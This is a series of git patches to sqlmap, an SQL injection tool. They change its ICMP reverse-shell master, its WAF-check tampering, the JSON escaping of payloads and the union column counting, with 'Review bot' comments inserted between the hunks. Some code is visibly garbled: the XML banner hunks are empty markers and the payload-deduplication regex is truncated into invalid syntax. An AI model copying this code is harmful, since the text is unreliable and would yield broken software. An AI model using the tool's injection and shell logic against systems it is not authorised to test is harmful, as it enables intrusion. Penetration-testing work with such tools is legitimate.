@@ -35,6 +35,22 @@ + + + + + + + + + + + + + + + + diff --git a/xml/banner/postgresql.xml b/xml/banner/postgresql.xml index 4c64844d790..7f03e8e8c4a 100644 --- a/xml/banner/postgresql.xml +++ b/xml/banner/postgresql.xml @@ -13,13 +13,4 @@ - - - - - - - - - diff --git a/xml/banner/server.xml b/xml/banner/server.xml index 48f0ab15888..737a13f143d 100644 --- a/xml/banner/server.xml +++ b/xml/banner/server.xml @@ -89,6 +89,10 @@ + + + + @@ -155,8 +159,8 @@ - - + + @@ -273,6 +277,22 @@ + + + + + + + + + + + + + + + + @@ -379,6 +399,14 @@ + + + + + + + + @@ -678,6 +706,14 @@ + + + + + + + + @@ -753,7 +789,15 @@ - + + + + + + + + + @@ -761,4 +805,10 @@ + + + + + + diff --git a/xml/banner/set-cookie.xml b/xml/banner/set-cookie.xml index c9e34d2ceaa..4e85296b8a6 100644 --- a/xml/banner/set-cookie.xml +++ b/xml/banner/set-cookie.xml @@ -11,7 +11,7 @@ - + From 8605c49911b23e91eec35324aa7d9208754460cd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 11 Apr 2018 13:06:47 +0200 Subject: [PATCH 111/428] Update related to the #3039 --- extra/icmpsh/icmpsh_m.py | 8 ++++++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 5 deletions(-) diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py index 6e96952b3d6..23a60b865c4 100644 --- a/extra/icmpsh/icmpsh_m.py +++ b/extra/icmpsh/icmpsh_m.py @@ -125,8 +125,12 @@ def main(src, dst): # Have the IP packet contain the ICMP packet (along with its payload) ip.contains(icmp) - # Send it to the target host - sock.sendto(ip.get_packet(), (dst, 0)) + try: + # Send it to the target host + sock.sendto(ip.get_packet(), (dst, 0)) + except socket.error, ex: + sys.stderr.write("'%s'\n" % ex) + sys.stderr.flush() if __name__ == '__main__': if len(sys.argv) < 3: diff --git a/lib/core/settings.py b/lib/core/settings.py index 746705d3f4e..0c0ba9441e6 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
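Review bot: The new `except socket.error` around `sock.sendto` in `main()` prints only the bare exception text (`"'%s'\n" % ex`) and carries on, so a raw-socket permission or routing error that does not fix itself would be printed repeatedly with nothing identifying the operation or the peer; include the context, e.g. `sys.stderr.write("error sending to '%s': %s\n" % (dst, ex))`. Whether the send sits inside a loop is not visible here, since `main()` starts and ends outside the hunk; if it does, consider giving up after a run of consecutive failures rather than retrying indefinitely. The `except socket.error, ex:` form is Python 2-only syntax, consistent with the rest of this tree but worth noting for any later port.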
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.10" +VERSION = "1.2.4.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index abe940bc4f7..b9f3373738d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -5,7 +5,7 @@ b0eb597c613afeff9d62898cf4c67a56 extra/cloak/cloak.py e0911386106b95d2ba4b12d651b2eb16 extra/dbgtool/dbgtool.py 1e5532ede194ac9c083891c2f02bca93 extra/dbgtool/__init__.py acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_ -2176d964f2d5ba2d871383d6a1868b8f extra/icmpsh/icmpsh_m.py +fe39e5c315d63afff5cb99ec42fc883f extra/icmpsh/icmpsh_m.py 2d020d2bdcee1170805f48839fdb89df extra/icmpsh/__init__.py 1e5532ede194ac9c083891c2f02bca93 extra/__init__.py 27629e01ba722271c990ad4b27151917 extra/mssqlsig/update.py @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -416a9d32cc0b6ee6281e0ec062a4d169 lib/core/settings.py +4130d34ca6a37e8944dfdf0b94643235 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From c634f0b0d6261aa900cae9d7d910e18abf19c9fd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 11 Apr 2018 13:14:09 +0200 Subject: [PATCH 112/428] Patch related to the #3041 --- lib/core/settings.py | 2 +- sqlmap.py | 9 ++++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 11 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 0c0ba9441e6..cc1ec7e1744 100644 
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.4.11"
+VERSION = "1.2.4.12"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/sqlmap.py b/sqlmap.py
index 0dbe6827a20..49dadc22817 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -265,11 +265,18 @@ def main():
 raise SystemExit
 elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")):
- errMsg = "please update the 'sqlalchemy' package"
+ errMsg = "please update the 'sqlalchemy' package "
 errMsg += "(Reference: https://github.com/apache/incubator-superset/issues/3447)"
 logger.error(errMsg)
 raise SystemExit
+ elif "must be pinned buffer, not bytearray" in excMsg:
+ errMsg = "error occurred at Python interpreter which "
+ errMsg += "is fixed in 2.7.x. Please update accordingly "
+ errMsg += "(Reference: https://bugs.python.org/issue8104)"
+ logger.error(errMsg)
+ raise SystemExit
+
 elif "can't start new thread" in excMsg:
 errMsg = "there has been a problem while creating new thread instance. "
 errMsg += "Please make sure that you are not running too many processes"
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index b9f3373738d..cb3b7f41707 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
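Review bot: The new `must be pinned buffer, not bytearray` branch tells the user the problem `is fixed in 2.7.x. Please update accordingly`, which names neither what to update (the Python interpreter itself) nor which release, and since every 2.7 install is "2.7.x" it reads as a contradiction to someone already on 2.7. Suggest `errMsg = "error occurred inside the Python interpreter (a bug fixed in later Python 2.7 releases). "` followed by `errMsg += "Please update your Python 2.7 installation "`. `main()` starts and ends outside the hunk.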
@@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4130d34ca6a37e8944dfdf0b94643235 lib/core/settings.py +16bc4ff0ccd5121f1b90016b5d759ef6 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -224,7 +224,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -ecbd0edbb6ea4cb6e1277ceb294d7819 sqlmap.py +5d1d27e7237584c4499ee9a3e698e384 sqlmap.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py From a8cb14ed4a4936524271e457e5daa5e32a481de0 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 11 Apr 2018 14:48:54 +0200 Subject: [PATCH 113/428] Minor patch (disable tamper script usage in WAF/IDS/IPS check phase) --- lib/controller/checks.py | 2 +- lib/core/settings.py | 2 +- lib/request/connect.py | 4 ++-- txt/checksum.md5 | 6 +++--- 4 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 7b2a97fa3b3..9f0868fec17 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py 
@@ -1359,7 +1359,7 @@ def checkWaf():
 conf.timeout = IDS_WAF_CHECK_TIMEOUT
 try:
- retVal = Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
+ retVal = Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True, disableTampering=True)[1] < IDS_WAF_CHECK_RATIO
 except SqlmapConnectionException:
 retVal = True
 finally:
diff --git a/lib/core/settings.py b/lib/core/settings.py
index cc1ec7e1744..648531af886 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.4.12"
+VERSION = "1.2.4.13"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 358fa22b416..1c83c5ce7f5 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -770,7 +770,7 @@ class _(dict):
 @staticmethod
 @stackedmethod
- def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True):
+ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True, disableTampering=False):
 """
 This method calls a function to get the target URL page content
 and returns its page ratio (0 <= ratio <= 1) or a boolean value
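Review bot: `disableTampering=True` is passed on the WAF probe with no comment saying why, and the reason is not obvious to a reader of `checkWaf()` who knows every other request honours `--tamper`; a one-liner above the call would settle it, e.g. `# send the probe untampered: the check measures whether the raw payload gets blocked, which tamper scripts would mask`. That rationale is inferred from the commit title rather than from visible code, so confirm the wording. It also means the WAF verdict is now taken on traffic that differs from what the tampered test requests will send, which is worth mentioning in the debug output. `checkWaf()` starts and ends outside the hunk.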
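Review bot: The new keyword `disableTampering=False` on `queryPage()` is not mentioned in the docstring that follows, which describes the return value but says nothing about this switch; add a line such as `disableTampering: when True, kb.tamperFunctions are not applied to this request (used by the WAF/IDS check)`. The docstring and the rest of the method run past the end of the hunk.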
@@ -817,7 +817,7 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent
 conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))
 if payload:
- if kb.tamperFunctions:
+ if not disableTampering and kb.tamperFunctions:
 for function in kb.tamperFunctions:
 try:
 payload = function(payload=payload, headers=auxHeaders)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index cb3b7f41707..f45269e14e1 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py
 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py
 b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py
 0f581182871148b0456a691ae85b04c0 lib/controller/action.py
-5084b16b037ed8d29f594f6113fe78e3 lib/controller/checks.py
+56d325f83671146c28ac300ff553420f lib/controller/checks.py
 c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py
 c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py
 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py
@@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-16bc4ff0ccd5121f1b90016b5d759ef6 lib/core/settings.py
+8a247c468eef23045b8537d4ff98d823 lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py
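Review bot: When `disableTampering` is set the tamper functions are skipped silently, so someone reading verbose traffic will see one request with a raw payload among tampered ones and have no clue why; a debug line at that point, e.g. `logger.debug("tampering disabled for this request")` if `logger` is available in this module, would explain it. The enclosing `queryPage()` starts and ends outside the hunk.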
@@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py
 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py
 7e8e0a3fdebbe443832c1bab2f8d3869 lib/request/basic.py
 c0cabedead14b8a23353b606672cff42 lib/request/comparison.py
-18052b8924b77eb2e772350b262aae88 lib/request/connect.py
+1865164621eb94c9c231006765065c17 lib/request/connect.py
 dd4598675027fae99f2e2475b05986da lib/request/direct.py
 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py
 eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py
From 148d1c9ff9ecbbb455ae0f4b31b833fca167b21e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Wed, 11 Apr 2018 15:19:44 +0200
Subject: [PATCH 114/428] Fixes #3037
---
 lib/core/common.py | 17 +++++++++++++++++
 lib/core/settings.py | 2 +-
 lib/request/connect.py | 11 +++--------
 txt/checksum.md5 | 6 +++---
 4 files changed, 24 insertions(+), 12 deletions(-)
diff --git a/lib/core/common.py b/lib/core/common.py
index 2908bc26057..7ce13952b04 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1493,6 +1493,23 @@ def parseTargetUrl():
 if conf.url != originalUrl:
 kb.originalUrls[conf.url] = originalUrl
+def escapeJsonValue(value):
+ """
+ Escapes JSON value (used in payloads)
+
+ # Reference: https://stackoverflow.com/a/16652683
+ """
+
+ retVal = ""
+
+ for char in value:
+ if char < ' ' or char == '"':
+ retVal += json.dumps(char)[1:-1]
+ else:
+ retVal += char
+
+ return retVal
+
 def expandAsteriskForColumns(expression):
 """
 If the user provided an asterisk rather than the column(s)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 648531af886..918b363a755 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
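Review bot: `escapeJsonValue()` escapes control characters and `"` but not the backslash, so a payload containing `\` is written unescaped into the JSON body and produces an invalid string (`\'` or `\x` are not legal JSON escapes); the `json.dumps()` code it replaces did escape backslashes, so this is a regression for any payload carrying one. Change the test to `if char < ' ' or char in ('"', '\\'):`. The per-character `retVal +=` loop would read and scale better as a `''.join(...)` over a generator, though that is secondary to the escaping gap.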
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.4.13"
+VERSION = "1.2.4.14"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 1c83c5ce7f5..78523236497 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -34,6 +34,7 @@ class WebSocketException(Exception):
 from lib.core.common import checkSameHost
 from lib.core.common import clearConsoleLine
 from lib.core.common import dataToStdout
+from lib.core.common import escapeJsonValue
 from lib.core.common import evaluateCode
 from lib.core.common import extractRegexResult
 from lib.core.common import findMultipartPostBoundary
@@ -841,16 +842,10 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent
 # with their HTML encoded counterparts
 payload = payload.replace('>', ">").replace('<', "<")
 elif kb.postHint == POST_HINT.JSON:
- if payload.startswith('"') and payload.endswith('"'):
- payload = json.dumps(payload[1:-1])
- else:
- payload = json.dumps(payload)[1:-1]
+ payload = escapeJsonValue(payload)
 elif kb.postHint == POST_HINT.JSON_LIKE:
 payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
- if payload.startswith('"') and payload.endswith('"'):
- payload = json.dumps(payload[1:-1])
- else:
- payload = json.dumps(payload)[1:-1]
+ payload = escapeJsonValue(payload)
 payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
 value = agent.replacePayload(value, payload)
 else:
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index f45269e14e1..17b0036faa6 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
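Review bot: The JSON_LIKE branch swaps quote kinds, calls `escapeJsonValue()`, and swaps back with nothing saying why; a comment such as `# JSON-like bodies use single-quoted strings: swap the quote kinds so escapeJsonValue() escapes the string delimiter, then swap back` would spare the next reader re-deriving it (that reading is inferred from the three replace() calls, so confirm it). Both branches now depend on `escapeJsonValue()`, which as added in this commit escapes only control characters and `"`, so a payload containing a backslash reaches the body unescaped where the previous `json.dumps()` path would have escaped it. `queryPage()` starts and ends outside the hunk.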
@@ -27,7 +27,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -31cd0692a626da935b1cac8f2cfba25a lib/core/common.py +7f97f69794a24670ccba1bb531815433 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8a247c468eef23045b8537d4ff98d823 lib/core/settings.py +2d6842f03c9916a90467f9720ebb35b0 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 7e8e0a3fdebbe443832c1bab2f8d3869 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -1865164621eb94c9c231006765065c17 lib/request/connect.py +e2b40b94446d59fb25abe68c429bae74 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From 29e683fb5bd5a921700ae5a6932823978644002b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 12 Apr 2018 11:33:23 +0200 Subject: [PATCH 115/428] Skip prepending CR to readInput messages if in non-TTY mode (ugly looking in Linux text editors) --- lib/core/common.py | 9 ++++++--- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 6 deletions(-) 
diff --git a/lib/core/common.py b/lib/core/common.py
index 7ce13952b04..695ab669672 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1015,8 +1015,11 @@ def readInput(message, default=None, checkBatch=True, boolean=False):
 elif answer is None and retVal:
 retVal = "%s,%s" % (retVal, getUnicode(item, UNICODE_ENCODING))
+ if message and getattr(LOGGER_HANDLER, "is_tty", False):
+ message = "\r%s" % message
+
 if retVal:
- dataToStdout("\r%s%s\n" % (message, retVal), forceOutput=not kb.wizardMode, bold=True)
+ dataToStdout("%s%s\n" % (message, retVal), forceOutput=not kb.wizardMode, bold=True)
 debugMsg = "used the given answer"
 logger.debug(debugMsg)
@@ -1030,7 +1033,7 @@ def readInput(message, default=None, checkBatch=True, boolean=False):
 else:
 options = unicode()
- dataToStdout("\r%s%s\n" % (message, options), forceOutput=not kb.wizardMode, bold=True)
+ dataToStdout("%s%s\n" % (message, options), forceOutput=not kb.wizardMode, bold=True)
 debugMsg = "used the default behavior, running in batch mode"
 logger.debug(debugMsg)
@@ -1043,7 +1046,7 @@ def readInput(message, default=None, checkBatch=True, boolean=False):
 if conf.get("beep"):
 beep()
- dataToStdout("\r%s" % message, forceOutput=not kb.wizardMode, bold=True)
+ dataToStdout("%s" % message, forceOutput=not kb.wizardMode, bold=True)
 kb.prependFlag = False
 retVal = raw_input().strip() or default
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 918b363a755..5da90e1dd20 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.4.14"
+VERSION = "1.2.4.15"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
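Review bot: The CR is now applied by mutating `message` once in the first hunk, and the three `dataToStdout()` calls below simply assume it has happened; that holds only if every path reaches the new `if message and getattr(LOGGER_HANDLER, "is_tty", False):` block first, which the layout suggests but cannot be confirmed here because `readInput()` starts and ends outside the hunks. A comment on the new block would record the intent, e.g. `# CR lets the prompt overwrite progress output on a terminal; skip it when not on a TTY, where it only garbles the text`. The `getattr(..., False)` fallback also silently drops the CR for any handler lacking `is_tty`, which is probably the wanted default but deserves a word.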
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 17b0036faa6..303f31cad3f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -7f97f69794a24670ccba1bb531815433 lib/core/common.py +9e88889d6fd9cb9a17e467b72ec30305 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2d6842f03c9916a90467f9720ebb35b0 lib/core/settings.py +e22083ec5717d91e68a18bf73ebcc628 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 60767de2eb9645001c6559dc2cd2680f06de6159 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 12 Apr 2018 12:25:37 +0200 Subject: [PATCH 116/428] Patching issue that got into with patch for #2934 (ORDER BY was unusable in majority of regular cases) --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 5da90e1dd20..bcc427d5792 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.4.15"
+VERSION = "1.2.4.16"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py
index 7a63bc37f1f..6d94cb875b4 100644
--- a/lib/techniques/union/test.py
+++ b/lib/techniques/union/test.py
@@ -50,7 +50,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
 retVal = None
 @stackedmethod
- def _orderByTechnique(lowerCount, upperCount):
+ def _orderByTechnique(lowerCount=None, upperCount=None):
 def _orderByTest(cols):
 query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
 query = agent.suffixQuery(query, suffix=suffix, comment=comment)
@@ -91,7 +91,7 @@ def _orderByTest(cols):
 lowerCount, upperCount = conf.uColsStart, conf.uColsStop
 if lowerCount == 1 or conf.uCols:
- found = kb.orderByColumns or _orderByTechnique(lowerCount, upperCount)
+ found = kb.orderByColumns or (_orderByTechnique(lowerCount, upperCount) if conf.uCols else _orderByTechnique())
 if found:
 kb.orderByColumns = found
 infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "")
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 303f31cad3f..0bc9ebc115d 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
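Review bot: `_orderByTechnique(lowerCount=None, upperCount=None)` now shadows the enclosing `lowerCount, upperCount` with parameters defaulting to None, and the call site passes the real bounds only under `conf.uCols`; what the body does with None is outside the hunk, so a reader has to take on trust that None means "probe with the built-in range". A one-line comment at the call would make that explicit, e.g. `# honour user-supplied bounds (--union-cols) only; otherwise let _orderByTechnique() use its own defaults`, and the shadowing itself deserves a note since the outer names are reassigned from `conf.uColsStart, conf.uColsStop` just above. `_findUnionCharCount()` starts and ends outside the hunk.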
@@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e22083ec5717d91e68a18bf73ebcc628 lib/core/settings.py +f01ac839011009e7c219fc11f528f348 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -96,7 +96,7 @@ f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -cbe59feb11526068bbbd35dca97b3b37 lib/techniques/union/test.py +a36be917cf86a5ee407c83d74567f324 lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From 8ca3287df4706630d1de5e1520fe1e8bc963e558 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 12 Apr 2018 14:38:32 +0200 Subject: [PATCH 117/428] Proper way to skip already used payloads (important to --suffix/--prefix cases) --- lib/controller/checks.py | 6 ++++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 5 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 9f0868fec17..b0b42b5036e 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py 
@@ -454,11 +454,13 @@ def checkSqlInjection(place, parameter, value):
 boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
 boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
 reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
+
 if reqPayload:
- if reqPayload in seenPayload:
+ stripPayload = re.sub(r"(\A|\b|_)([A-Za-z]{4}((?.\g<4>", reqPayload)
+ if stripPayload in seenPayload:
 continue
 else:
- seenPayload.add(reqPayload)
+ seenPayload.add(stripPayload)
 else:
 reqPayload = None
diff --git a/lib/core/settings.py b/lib/core/settings.py
index bcc427d5792..e0b1400e254 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.4.16"
+VERSION = "1.2.4.17"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
